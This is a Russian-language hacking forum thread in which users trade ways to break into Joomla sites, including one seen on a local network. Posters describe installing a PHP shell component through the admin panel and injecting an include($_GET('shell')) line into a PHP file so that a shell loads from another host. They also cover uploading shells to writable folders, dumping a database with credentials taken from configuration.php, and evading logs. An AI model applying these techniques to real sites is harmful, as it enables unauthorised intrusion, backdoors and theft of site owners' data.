Попробуй через шаблоны.
Тогда шелл будет лежать в директории site.com/templates.

Ребята, подскажите ещё варианты взлома этого двига. очень надо)) Может что-то через метасплоит выйдет? надеюсь на помощь

блин, в локалке появился сайт на этом движке... слюньки текут... только ниразу с движком не работал. подскажите по существу что-то. плз. буду благодарен))

Если тебе нужно что-то, то смотри это "что-то" здесь:
http://www.securitylab.ru/search/index.php?q=Joomla&where=iblock_vulnerability
=\

есть копонент php shell для джомала где то 57 кб. в админке выбираешь установить компонент и указываешь на предварительно скачанный компонент php шел
я делал так, можно еще через компонент joomla explorer - открываешь любой php файл у которого стоят права на выполнение шела и добавляешь в конец иили в начало строку include($_GET('shell')); после пишешь полный путь к этой страничке м через cmd гет параметр подгружаешь шел с другого хоста, или можешь папку на чтение записиь нацйти и просто тудда шел загрузить, но жто опаснее - так как его можна найти очень легко

А есть дыры для Joomla! 1.0.12 Lavra Edition 2007? и есть Какие? пример желательно

Всем здоровья!
Подскажите, пожалуйста!

Сайт на Joomla!
В файле configuration.php есть строки:

$mosConfig_db = 'site';
$mosConfig_user = 'site';
$mosConfig_password = '4168227'; Изменен.

Это как я понял акк к БД. Вопрос - как её сдампить?

Пробывал через r57 - подключается к БД, но почему-то не дампит.
Спасибо.

мускульные ГУИ и вперёд. [Navicat MySQL в полне подойдёт]

http://shankar.name/sql.phps вот этим, пост запросы в логах не палятся

__________________
Лучший способ защиты - это нападение!!!